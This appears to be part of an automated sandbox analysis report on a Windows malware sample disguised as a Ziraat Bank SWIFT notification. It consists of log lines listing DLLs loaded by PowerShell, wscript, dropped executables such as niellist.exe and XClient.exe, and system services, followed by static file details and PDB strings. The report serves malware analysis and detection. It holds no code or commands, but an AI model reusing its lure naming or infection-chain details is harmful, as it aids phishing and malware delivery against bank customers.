Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mpr.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: secur32.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\Locator.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\Locator.exe Section loaded: mpr.dll
Source: C:\Windows\System32\Locator.exe Section loaded: secur32.dll
Source: C:\Windows\System32\Locator.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\Locator.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\Locator.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Locator.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Static file information: File size 2007552 > 1048576
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
